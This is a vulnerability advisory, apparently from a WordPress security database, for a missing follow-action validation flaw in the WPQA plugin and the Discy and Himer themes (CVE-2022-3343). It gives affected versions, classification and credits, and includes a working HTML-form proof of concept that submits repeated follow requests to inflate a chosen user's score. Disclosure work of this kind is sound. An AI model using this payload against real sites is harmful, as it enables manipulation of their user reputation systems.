WordPress Plugin Vulnerabilities

WPQA < 5.9.3 - Missing validation lead to functionality abuse

Description

The plugin (which is a companion plugin used with Discy and Himer themes) incorrectly tries to validate that a user already follows another in the wpqa_following_you_ajax action, allowing a user to inflate their score on the site by having another user send repeated follow actions to them.

Proof of Concept

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
	<input type="hidden" name="action" value="wpqa_following_you">

        <!-- change the following value to the user id of the user you wish to reward! -->
	<input type="hidden" name="following_var_id" value="2">

        <!-- Version 5.9.1 checks nonce, replace with the correct one for the user submitting the form. -->
        <input type="hidden" name="following_nonce" value="1234567890">

	<input type="submit" value="Get rich!">
</form>

Affects Plugins

Plugin icon
wpqa
Fixed in 5.9.3

Affects Themes

discy
Fixed in 5.5.3
himer
Fixed in 1.9.3

References

CVE
CVE-2022-3343

Classification

Type
IDOR
OWASP top 10
A5: Broken Access Control
CWE
CWE-639
CVSS
3.5 (low)

Miscellaneous

Original Researcher
Harsh Tandel
Submitter
Harsh Tandel
Submitter twitter
H4r5h_T4nd37
Verified
Yes
WPVDB ID
e507b1b5-1a56-4b2f-b7e7-e22f6da1e32a

Timeline

Publicly Published
2022-12-13 (about 1 years ago)
Added
2022-12-13 (about 1 years ago)
Last Updated
2023-03-16 (about 1 years ago)

Other

Published
Title
Published
2024-01-05
Title
Profile Builder < 3.10.8 - Contributor+ User Metadata Disclosure
Published
2022-12-07
Title
BookingPress < 1.0.31 - Unauthenticated IDOR in appointment_id
Published
2022-10-04
Title
WooCommerce Products Vendor < 2.1.66 - Note Creation via IDOR
Published
2023-09-22
Title
Pre-Publish Checklist < 1.1.2 - Insecure Direct Object Reference to Arbitrary Post '_ppc_meta_key' Update
Published
2024-03-29
Title
Whizzy <= 1.1.18 - Authenticated (Subscriber+) Insecure Direct Object Reference